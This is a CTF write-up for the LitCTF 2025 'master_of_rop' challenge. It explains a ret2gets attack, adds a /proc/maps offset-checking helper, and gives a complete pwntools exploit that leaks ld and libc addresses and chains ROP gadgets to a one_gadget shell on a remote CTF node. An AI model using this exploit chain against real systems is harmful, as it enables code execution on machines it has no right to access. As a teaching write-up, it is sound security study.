
NSSCTF-LitCTF-2025-master_of_rop Writeup


Challenge

Challenge link

Attack approach

Not much to say: it is ret2gets.

However, the local and remote system environments differ, so the situation after leaking the TLS pointer is not the same.

Remote is fairly simple: the offset between libc and TLS is fixed.

In my local environment, though, the leaked value is an address related to ld, so a gadget inside ld has to be used to leak libc first.
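An added diagnostic for the local-versus-remote discrepancy described above (my code, not from the original post). It parses /proc/&lt;pid&gt;/maps output (a constructed sample with made-up addresses, not the real layout of this binary or any libc) and reports which object a leaked pointer falls in and how far that region is from the base of ld or libc, which is how one checks whether a constant like anon_base + 0xc000 holds in a given environment before relying on it.

```python
from typing import List, Optional, Tuple

# Constructed /proc/<pid>/maps sample (made-up addresses, not the real layout
# of the challenge binary, libc or ld on any machine).
SAMPLE_MAPS = """\
00400000-00401000 r--p 00000000 fd:01 1234 /home/user/pwn_patched
00401000-00402000 r-xp 00001000 fd:01 1234 /home/user/pwn_patched
00404000-00405000 rw-p 00003000 fd:01 1234 /home/user/pwn_patched
7f3c5e200000-7f3c5e228000 r--p 00000000 fd:01 5678 /usr/lib/libc.so.6
7f3c5e415000-7f3c5e419000 rw-p 00214000 fd:01 5678 /usr/lib/libc.so.6
7f3c5e419000-7f3c5e426000 rw-p 00000000 00:00 0
7f3c5e430000-7f3c5e432000 rw-p 00000000 00:00 0
7f3c5e432000-7f3c5e434000 r--p 00000000 fd:01 9012 /usr/lib/ld-linux-x86-64.so.2
7ffd1a2e0000-7ffd1a301000 rw-p 00000000 00:00 0 [stack]
"""

Mapping = Tuple[int, int, str, str]  # (start, end, perms, path or '')

def parse_maps(text: str) -> List[Mapping]:
    maps: List[Mapping] = []
    for line in text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 5:
            continue
        start, end = (int(x, 16) for x in parts[0].split('-'))
        maps.append((start, end, parts[1], parts[5] if len(parts) == 6 else ''))
    return maps

def base_of(maps: List[Mapping], path: str) -> int:
    """Lowest start among all mappings of one object: the libc_base / ld_base value."""
    return min(s for s, _, _, p in maps if p == path)

def locate(addr: int, maps: List[Mapping]) -> Optional[Tuple[str, int]]:
    """(object, offset from that object's base) for the region holding addr.
    Anonymous regions are reported as '[anon]' relative to their own start."""
    for start, end, _, path in maps:
        if start <= addr < end:
            if path and not path.startswith('['):
                return (path, addr - base_of(maps, path))
            return (path or '[anon]', addr - start)
    return None

def delta_to_object(addr: int, maps: List[Mapping], needle: str) -> Optional[int]:
    """Distance from the start of the region holding addr to the base of the first
    object whose path contains needle ('ld-linux', 'libc'); may be negative."""
    region = next(((s, e) for s, e, _, _ in maps if s <= addr < e), None)
    paths = [p for _, _, _, p in maps if needle in p]
    if region is None or not paths:
        return None
    return base_of(maps, paths[0]) - region[0]
```

Run it against the maps of the local process and of the remote-matching Docker image: if delta_to_object() differs between the two, the hard-coded offset must differ too.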

exp

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']

# 0 = attack the remote instance, 1 = run the patched binary locally
debug = 0

if debug:
	io = process('./pwn_patched')
else:
	io = remote('node4.anna.nssctf.cn', 21460)

# Binary is not PIE, so these addresses are fixed
rw_addr = 0x404400      # writable area used as the fake stack frame (rbp)
gets_plt = 0x401080
puts_plt = 0x401060
again_addr = 0x4011B1   # return here to trigger the overflow again

def attack():
	# Stage 1 (ret2gets): after the vulnerable gets returns, rdi still points at
	# the stdin lock structure. Two extra gets calls rewrite it so that puts
	# then prints the TLS-related pointer it holds.
	payload = b'A' * 32 + p64(rw_addr) + p64(gets_plt) + p64(gets_plt) + p64(puts_plt) + p64(again_addr)
	io.sendlineafter(b'LitCTF2025!\n', payload)
	io.sendline(b'A' * 8 + b'\x00' * 6)
	io.sendline(b'A' * 4)
	io.recv(8)   # discard the 8 filler bytes, then read the 6-byte pointer
	anon_base = u64(io.recv(6).ljust(8, b'\x00')) - 0x740
	log.info(f'anon_base = {hex(anon_base)}')
	# Local environment: the leak lands in an anonymous mapping at a fixed
	# distance below ld, so ld can be located from it
	ld_base = anon_base + 0xc000
	log.info(f'ld_base = {hex(ld_base)}')
	pop_rdi_pop_rbp_ret = ld_base + 0x23dcc

	# Stage 2: use a gadget from ld to puts() a libc pointer stored in the
	# anonymous mapping, giving libc_base
	payload = b'A' * 32 + p64(rw_addr) + p64(pop_rdi_pop_rbp_ret) + p64(anon_base + 0x6c0) + p64(rw_addr) + p64(puts_plt) + p64(again_addr)
	io.sendlineafter(b'LitCTF2025!\n', payload)
	libc_base = u64(io.recv(6).ljust(8, b'\x00')) - 0x20b680
	log.info(f'libc_base = {hex(libc_base)}')
	pop_rbx_ret = libc_base + 0x586e4
	pop_r12_ret = libc_base + 0x110951
	onegadget = libc_base + 0xef4ce

	# Stage 3: satisfy the one_gadget constraints (rbx = r12 = 0) and jump to it
	payload = b'A' * 32 + p64(rw_addr) + p64(pop_rbx_ret) + p64(0) + p64(pop_r12_ret) + p64(0) + p64(onegadget)
	io.sendlineafter(b'LitCTF2025!\n', payload)
	io.interactive()

attack()